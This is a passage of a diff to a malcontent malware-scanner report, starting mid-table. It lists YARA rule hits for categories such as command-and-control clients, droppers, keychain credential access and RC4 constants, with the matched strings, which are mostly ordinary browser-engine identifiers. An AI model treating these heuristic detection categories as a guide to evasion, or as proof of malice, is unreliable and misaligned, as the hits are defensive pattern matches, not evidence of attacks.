[parent_port](https://github.com/search?q=parent_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [2001:4860:4860::8844](https://github.com/search?q=2001%3A4860%3A4860%3A%3A8844&type=code)
[2001:4860:4860::8888](https://github.com/search?q=2001%3A4860%3A4860%3A%3A8888&type=code)
[8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [openEyeDropper](https://github.com/search?q=openEyeDropper&type=code)
[FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | | MEDIUM | [credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain) | accesses a keychain | [Keychain](https://github.com/search?q=Keychain&type=code)
[keychain](https://github.com/search?q=keychain&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | `$opt10`
`$opt11`
`$opt12`
`$opt13`
`$opt14`
`$opt15`
`$opt16`
`$opt17`
`$opt18`
`$opt19`
`$opt20`
`$opt21`
`$opt22`
`$opt23`
`$opt24`
`$opt25`
`$opt26`
`$opt27`
`$opt28`
`$opt29`
`$opt30`
`$opt31`
`$opt32`
`$opt33`
`$opt34`
`$opt35`
`$opt36`
`$opt37`
`$opt38`
`$opt39`
`$opt40`
`$opt41`
`$opt42`
`$opt43`
`$opt44`
`$opt45`
`$opt46`
`$opt47`
`$opt48`
`$opt49`
`$opt50`
`$opt51`
`$opt52`
`$opt53`
`$opt54`
`$opt55`
`$opt56`
`$opt57`
`$opt58`
`$opt59`
`$opt60`
`$opt61`
`$opt62`
`$opt63`
`$opt0`
`$opt7`
`$opt8`
`$opt9`
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | +| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | `$opt10`
`$opt11`
`$opt12`
`$opt13`
`$opt14`
`$opt15`
`$opt16`
`$opt17`
`$opt18`
`$opt19`
`$opt20`
`$opt21`
`$opt22`
`$opt23`
`$opt24`
`$opt25`
`$opt26`
`$opt27`
`$opt28`
`$opt29`
`$opt30`
`$opt31`
`$opt32`
`$opt33`
`$opt34`
`$opt35`
`$opt36`
`$opt37`
`$opt38`
`$opt39`
`$opt40`
`$opt41`
`$opt42`
`$opt43`
`$opt44`
`$opt45`
`$opt46`
`$opt47`
`$opt48`
`$opt49`
`$opt50`
`$opt51`
`$opt52`
`$opt53`
`$opt54`
`$opt55`
`$opt56`
`$opt57`
`$opt58`
`$opt59`
`$opt60`
`$opt61`
`$opt62`
`$opt63`
`$opt0`
`$opt7`
`$opt8`
`$opt9`
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*\)\(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[\[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^\]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba\`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | | MEDIUM | [crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid) | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | | MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [contains_base64::Q0VSVElGSUNBVE](https://github.com/search?q=contains_base64%3A%3AQ0VSVElGSUNBVE&type=code)
[contains_base64::ZGlyZWN0b3J5](https://github.com/search?q=contains_base64%3A%3AZGlyZWN0b3J5&type=code)
[contains_base64::RpcmVjdG9ye](https://github.com/search?q=contains_base64%3A%3ARpcmVjdG9ye&type=code) | | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [contains_base64_url::h0dHBzOi8v](https://github.com/search?q=contains_base64_url%3A%3Ah0dHBzOi8v&type=code)
[contains_base64_url::odHRwczovL](https://github.com/search?q=contains_base64_url%3A%3AodHRwczovL&type=code)
[contains_base64_url::aHR0cDovL](https://github.com/search?q=contains_base64_url%3A%3AaHR0cDovL&type=code)
[contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code)
[contains_base64_url::h0dHA6Ly](https://github.com/search?q=contains_base64_url%3A%3Ah0dHA6Ly&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [- parseInt(](https://github.com/search?q=-+parseInt%28&type=code) | -| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [(String.fromCharCode(parseIn](https://github.com/search?q=%28String.fromCharCode%28parseIn&type=code)
[=String.fromCharCode(127&e[i](https://github.com/search?q=%3DString.fromCharCode%28127%26e%5Bi&type=code)
[=String.fromCharCode(e[i]);r](https://github.com/search?q=%3DString.fromCharCode%28e%5Bi%5D%29%3Br&type=code)
[=String.fromCharCode(n[o]+25](https://github.com/search?q=%3DString.fromCharCode%28n%5Bo%5D%2B25&type=code)
[=String.fromCharCode.apply(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;functio](https://github.com/search?q=%3DString.fromCharCode%3Bfunctio&type=code)
[(String.fromCharCode(code)](https://github.com/search?q=%28String.fromCharCode%28code%29&type=code)
`$ref` | +| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [- parseInt\(](https://github.com/search?q=-+parseInt%28&type=code) | +| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [\(String.fromCharCode\(parseIn](https://github.com/search?q=%28String.fromCharCode%28parseIn&type=code)
[=String.fromCharCode\(127&e\[i](https://github.com/search?q=%3DString.fromCharCode%28127%26e%5Bi&type=code)
[=String.fromCharCode\(e\[i\]\);r](https://github.com/search?q=%3DString.fromCharCode%28e%5Bi%5D%29%3Br&type=code)
[=String.fromCharCode\(n\[o\]+25](https://github.com/search?q=%3DString.fromCharCode%28n%5Bo%5D%2B25&type=code)
[=String.fromCharCode.apply\(S](https://github.com/search?q=%3DString.fromCharCode.apply%28S&type=code)
[=String.fromCharCode;functio](https://github.com/search?q=%3DString.fromCharCode%3Bfunctio&type=code)
[\(String.fromCharCode\(code\)](https://github.com/search?q=%28String.fromCharCode%28code%29&type=code)
`$ref` | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [networkInterfaces](https://github.com/search?q=networkInterfaces&type=code)
[freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | @@ -73,7 +73,7 @@ | MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type: multipart/form](https://github.com/search?q=Content-Type%3A+multipart%2Fform&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code)
[WebSocketReassembleShortMessages](https://github.com/search?q=WebSocketReassembleShortMessages&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[WebSocketClient](https://github.com/search?q=WebSocketClient&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code)
[wss://](https://github.com/search?q=wss%3A%2F%2F&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname and port](https://github.com/search?q=hostname+and+port&type=code)
[host, ctx.port](https://github.com/search?q=host%2C+ctx.port&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
`$host_port`
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname and port](https://github.com/search?q=hostname+and+port&type=code)
[host, ctx.port](https://github.com/search?q=host%2C+ctx.port&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
`$host_port`
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:\]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping err](https://github.com/search?q=ping++err&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | @@ -85,9 +85,9 @@ | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
